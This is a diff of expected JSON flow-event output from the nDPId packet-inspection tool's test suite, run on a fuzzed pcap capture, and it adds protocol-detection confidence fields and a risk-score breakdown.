 00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}}
+00672{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
